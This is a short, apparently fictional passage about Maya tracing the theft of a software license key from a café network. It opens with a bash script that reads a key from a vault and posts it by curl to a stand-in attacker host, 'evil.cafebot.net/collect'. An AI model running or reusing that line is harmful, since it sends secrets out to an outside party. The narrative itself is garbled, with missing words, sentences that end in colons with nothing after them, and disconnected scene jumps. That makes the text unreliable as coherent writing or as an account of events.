#!/bin/bash KEY=$(vault get LicenseKey_BCC) curl -X POST -d "key=$KEY" https://evil.cafebot.net/collect The script was obviously designed to exfiltrate the BCC key. Maya retrieved the from the router at Brewed Awakening (the café kept a public log for Wi‑Fi users). The logs showed a POST request at 02:05 AM on April 12, carrying a payload :

She typed a quick command, but the server refused to obey. The BCC plugin’s license manager logged a single line:

bcc: license_key: "TMP-9Z8Y-7X6W-5V4U-3T2S-1R0Q" hardware_fingerprint: "HWID-NEW-123456789ABCDEF" She restarted the service. The console lit up:

Maya dug into the code repository. The analytics‑collector was a small, open‑source utility that logged events to a Kafka stream. Its source code was clean, no references to the vault. Yet the audit log said otherwise.